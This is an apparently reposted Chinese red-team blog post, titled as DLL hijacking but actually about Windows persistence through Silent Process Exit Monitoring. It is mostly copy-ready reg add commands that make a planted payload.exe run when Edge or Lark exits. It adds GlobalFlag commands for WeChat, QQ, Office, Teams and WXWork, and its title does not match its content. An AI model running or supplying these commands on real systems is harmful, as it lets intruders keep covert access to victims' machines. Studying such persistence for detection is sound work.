文章总结: 本文介绍利用Windows静默进程退出监控功能实现权限维持的技术,通过修改注册表在目标进程(如Edge、飞书等)退出时触发恶意程序执行。文档详细说明了GlobalFlag和ReportingMode参数配置,并给出针对多种常见应用的完整注册表操作命令。 综合评分: 85 文章分类: 渗透测试,红队,内网渗透,恶意软件,权限维持
权限维持–DLL劫持
原创
One One
One security
2026年5月5日 20:45 北京
在小说阅读器读本章
去阅读
利用 Windows 的 Silent Process Exit Monitoring 功能,当目标进程退出时触发监控程序执行, HKLM 写入需要管理员,当用户使用某个应用并结束时自动执行恶意文件,触发后为普通用户权限
GlobalFlag 值说明
512 (0x200) = FLG_MONITOR_SILENT_PROCESS_EXIT 启用静默进程退出监控 其他常用值: 256 (0x100) = FLG_HEAP_ENABLE_TAIL_CHECK 1024 (0x400) = FLG_HEAP_VALIDATE_PARAMETERS 2048 (0x800) = FLG_HEAP_VALIDATE_ALL ReportingMode 值说明 0 = LAUNCH_MONITOR_PROCESS (启动监控进程) 1 = LAUNCH_MONITOR_PROCESS_AND_EXIT (启动监控进程并退出) 2 = LAUNCH_AND_SUSPEND_MONITOR_PROCESS
添加方法
劫持对象-Microsoft Edge
:: 启用进程退出监控 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
:: 配置静默退出监控 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\msedge.exe" /v ReportingMode /t REG_DWORD /d 1 /f
:: 设置监控程序(程序退出时触发) reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\msedge.exe" /v MonitorProcess /d "C:\Windows\Temp\payload.exe" /f
劫持对象-飞书 Lark
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Lark.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Lark.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Lark.exe" /v MonitorProcess /d "C:\Windows\Temp\payload.exe" /f
其他常用目标
:: 微信 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WeChat.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
:: QQ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
:: Excel reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EXCEL.EXE" /v GlobalFlag /t REG_DWORD /d 512 /f
:: Word reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINWORD.EXE" /v GlobalFlag /t REG_DWORD /d 512 /f
:: Teams reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Teams.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
:: 企业微信 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WXWork.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
最近创建了一个交流群,需要的师傅可以扫码进入
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:One security One One《权限维持–DLL劫持》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论